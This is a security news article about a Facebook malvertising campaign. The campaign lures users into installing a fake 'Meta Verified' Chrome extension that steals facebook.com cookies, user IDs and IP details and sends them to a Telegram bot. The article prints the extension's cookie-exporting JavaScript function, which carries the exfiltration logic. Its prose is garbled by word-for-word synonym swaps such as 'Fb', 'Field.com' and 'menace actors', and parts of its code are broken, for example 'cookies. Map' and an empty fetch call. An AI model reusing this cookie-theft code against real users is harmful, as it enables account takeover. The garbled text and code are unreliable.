Malicious actors have launched a classy malvertising marketing campaign on Fb that coerces unsuspecting customers into putting in a pretend “Meta Verified” browser extension.
Promoted by way of seemingly legit video tutorials, these advertisements promise to unlock the coveted blue verification tick with out paying Meta’s subscription price.
In actuality, the extension is engineered to reap delicate consumer knowledge, together with session cookies, entry tokens, and IP addresses.
By leveraging trusted platforms like Field.com for internet hosting, attackers guarantee excessive availability and evade easy URL-blocking defenses, making the rip-off seem each genuine and risk-free.
Upon nearer inspection, the video tutorials accompanying the advertisements bear the fingerprints of Vietnamese-speaking menace actors, with narration and code feedback written in Vietnamese.
The extension’s code, though clumsily obfuscated and certain generated by an AI-assisted toolkit, nonetheless successfully exfiltrates knowledge.
Bitdefender analysts recognized using the Fb Graph API to question Enterprise account data as soon as legitimate entry tokens are acquired, permitting attackers to differentiate high-value company profiles from private accounts.
Malicious browser extension advert (Supply – Bitdefender)
Victims who comply with the tutorial unwittingly grant the extension permissions to learn and export cookies from the fb.com area.
As soon as put in, the extension instantly invokes an exportCookies perform that compiles each cookie right into a formatted string earlier than transmitting it to a Telegram bot managed by the attackers.
Cookie export perform (Supply – Bitdefender)
To additional personalize the stolen knowledge, the malware queries to append geolocation particulars, bolstering its marketability on underground boards.
Bitdefender researchers famous that variants of this extension embody adjustable parameters for tick dimension and place, suggesting an automatic pipeline for producing new marketing campaign property with minimal guide effort.
The modular design additionally helps automated execution upon Chrome startup, guaranteeing persistent knowledge harvesting even when customers disable and re-enable the extension.
An infection Mechanism Deep Dive
The core of the an infection mechanism lies within the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens with out triggering consumer prompts.
After set up—triggered by clicking on an advert hyperlink—the extension makes use of chrome.cookies.getAll({ area: “fb.com” }, callback) to assemble cookies.
Inside the callback, it constructs the payload:-
async perform exportCookies() {
chrome.cookies.getAll({ area: “fb.com” }, async cookies => {
const cookieString = cookies. Map(c => `${c.identify}=${c.worth}`).be a part of(“;”);
const userId = cookies. Discover(c => c.identify === “c_user”)?.worth || “Unknown”;
const ipInfo = await fetch(”).then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}nIP: $ “Unknown”nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}
This streamlined method bypasses many endpoint-based detections, whereas using legit domains for internet hosting and command-and-control reduces the probability of speedy takedown.
Safety groups ought to monitor irregular cookie export exercise and implement rigorous extension vetting to defend in opposition to such industrialized malvertising threats.
Enhance your SOC and assist your staff defend what you are promoting with free top-notch menace intelligence: Request TI Lookup Premium Trial.
